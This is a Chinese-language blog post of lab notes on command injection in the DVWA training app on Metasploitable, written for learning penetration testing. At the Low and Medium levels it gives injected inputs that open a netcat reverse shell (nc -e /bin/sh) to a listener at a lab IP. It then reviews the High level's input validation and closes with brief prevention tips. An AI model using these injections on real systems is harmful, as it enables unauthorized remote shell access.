Open in app

Sign in

Write

Sign in

Metasploitable 學習筆記-DVWA Command injection 命令注入攻擊與 Reverse Shell

Kuro Huang
資安工作者的學習之路
Published in
6 min readMay 17, 2020

這是一篇系列文,有關看一些不同的Metasploitable介紹與教學的練習紀錄

什麼是Command injection

根據OWASP解釋:

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.

簡單說就是透過主機系統上的程序執行任意命令

指令

常見的指令有幾個

  • ;能夠直接執行第二個命令
  • && 第一個指令成功後執行第二個
  • || 第一個指令失敗後執行第二個

Low 等級

執行ping與ls看看,先使用ping 8.8.8.8與; 嘗試執行指令

Reverse Shell

看來我們的command execution成功了,試著Revsrse看看

  • 使用nc 監聽(Netcat)

nc -vv -l -p 8080

nc [詳細輸出] [監聽] [port] 8080

  • 使用bin sh或bin bash

nc -e /bin/sh [ip] 8080

執行Reverse Shell

  1. 在Kali執行nc -vv -l -p 8080
  2. 在網頁執行nc -e /bin/sh [ip] 8080
  3. 執行指令

nc -vv -l -p 8080

8.8.8.8;nc -e /bin/sh 192.168.40.128 8080

Medium 等級

使用 | 指令

| : 第一個命令的輸出當作下一個命令的輸入

參考教學:

16. Linux 管道符( '|' )

利用Linux所提供的管道符"|"将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。 连续使用管道意味着第一个命令的输出会作为…

www.jianshu.com

# cat /etc/passwd | grep /bin/bash | wc -l

利用第一个管道将cat命令(显示passwd文件的内容)的输出送给grep命令,grep命令找出含有“/bin /bash”的所有行;第二个管道将grep的输出送给wc命令,wc命令统计出输入中的行数。这个命令的功能在于找出系统中有多少个用户使用bash。

執行命令

8.8.8.8 | nc -e /bin/sh 192.168.40.128 8080

High等級

高級部分應該bypass不了(或是我解不開),我們點選View Source Code看一下內容:

// Split the IP into 4 octects
$octet = explode(“.”, $target);

這段程式碼將IP給拆開處理,例如:

255.255.255.255  --- [255, 255, 255, 255]

// Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {

當我們用指令或空白時候跳到這段如果不是數字就會出錯,確保每個輸入不會有其他的字串之類

預防

  • 不要讓使用者用危險的指令
  • 正規表達式過濾處理

之後會繼續寫這系列有關的筆記,之後會做個目錄表列一下各個主題的網址方便搜尋與瀏覽。

我做的資安相關貼圖(陸續上架中)

Kuro Huang的LINE貼圖一覽 | LINE STORE

快到LINE的官方線上商店看看「Kuro Huang」的貼圖吧!

store.line.me

https://medium.com/blacksecurity/tagged/ctf
若您喜歡我的文章,歡迎按下「拍手」與Liker按讚給我支持並轉發給你的朋友們(可以多拍幾下手喔),或是「Follow」我,讓我提供文章給您。

Facebook 粉絲專頁 剛開始建立經營 不會洗版(沒有時間) !!包含資安與投資的資訊,歡迎追蹤我並分享。

資安工作者的技術與投資學習路

資安工作者的技術與投資學習路. 資訊安全,網路管理,台股與美股的投資理財學習筆記。 經營部落格: https://medium.com/blacksecurity eToro長期投資帳戶…

www.facebook.com

也歡迎繼續閱讀:

網路安全封包分析:Wireshark 快速判斷IP位置並找出可疑程式 — 使用GeoLite2

CTF Write-up 滲透測試系列

https://medium.com/blacksecurity/tagged/ctf
Ctf
Metasploitable
Kali Linux
Pentesting
Dvwa

--

--

Kuro Huang
資安工作者的學習之路

Written by Kuro Huang

1.1K Followers
Editor for

對教育充滿期待的資安從業者,現任ISC2台北分會理監事會成員,喜歡用專業興趣交朋友建立友誼。曾擔任資安管理師與四大會計師事務所資安顧問,希望對資安社群盡一點心力,並期望自己與身旁的人能有所進步,歡迎喝咖啡聊資安。希望保持著定期參與資安社群活動。個人介紹網站https://portaly.cc/kurohuang

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams